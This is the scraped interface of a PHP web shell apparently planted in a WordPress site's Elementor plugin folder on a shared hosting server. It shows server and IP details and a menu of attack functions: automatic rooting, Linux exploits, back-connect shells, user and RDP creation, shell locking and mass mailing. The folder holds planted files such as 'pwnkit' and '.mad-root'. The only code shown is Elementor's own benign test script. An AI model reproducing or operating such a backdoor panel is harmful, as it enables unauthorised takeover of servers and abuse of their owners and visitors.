Linux webd002.cluster130.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
Apache
: 10.130.40.2 | : 216.73.217.172
Cant Read [ /etc/named.conf ]
8.3.31
espacpq
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
espacpq /
www /
wp-content /
plugins /
elementor /
[ HOME SHELL ]
Name
Size
Permission
Action
app
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
core
[ DIR ]
drwxr-xr-x
data
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
migrations
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
vendor_prefixed
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
CONTRIBUTING.md
4.71
KB
-rw-r--r--
adminer.php
0
B
-rw-r--r--
changelog.txt
341.72
KB
-rw-r--r--
elementor.php
4.25
KB
-rw-r--r--
license.txt
34.32
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
29.72
KB
-rw-r--r--
turbo.json
253
B
-rw-r--r--
update-snapshots-linux.js
1.49
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : update-snapshots-linux.js
const { spawn, exec } = require( 'child_process' ); const packageJson = require( './package.json' ); function isDockerExist() { return new Promise( ( resolve ) => { exec( 'docker -v', ( error ) => { resolve( ! error ); } ); } ); } async function run( grep ) { const playwrightVersion = packageJson.devDependencies[ '@playwright/test' ]; const workingDir = process.cwd(); const browsers = process.env.BROWSERS || 'chromium'; const command = 'docker run'; const options = [ '--rm', '--network host', `--volume ${ workingDir }:/work`, '--workdir /work/', `--env BROWSERS=${ browsers }`, '--interactive', process.env.CI ? '' : '--tty', ]; const image = `mcr.microsoft.com/playwright:v${ playwrightVersion.replace( '^', '' ) }-jammy`; const grepFlag = grep.length ? `--grep="${ grep }"` : ''; const commandToRun = `/bin/bash -c "npm run test:playwright -- --update-snapshots ${ grepFlag }"`; await new Promise( ( resolve, reject ) => { const child = spawn( `${ command } ${ options.join( ' ' ) } ${ image } ${ commandToRun }`, { stdio: 'inherit', shell: true, } ); child.on( 'close', ( code ) => { if ( code !== 0 ) { reject( new Error( `Docker process exited with code ${ code }` ) ); } else { resolve(); } } ); } ); } ( async () => { if ( ! await isDockerExist() ) { // eslint-disable-next-line no-console console.error( 'Docker is not installed, please install it first.' ); process.exit( 1 ); } await run( process.argv.slice( 2 ) ); } )();
Close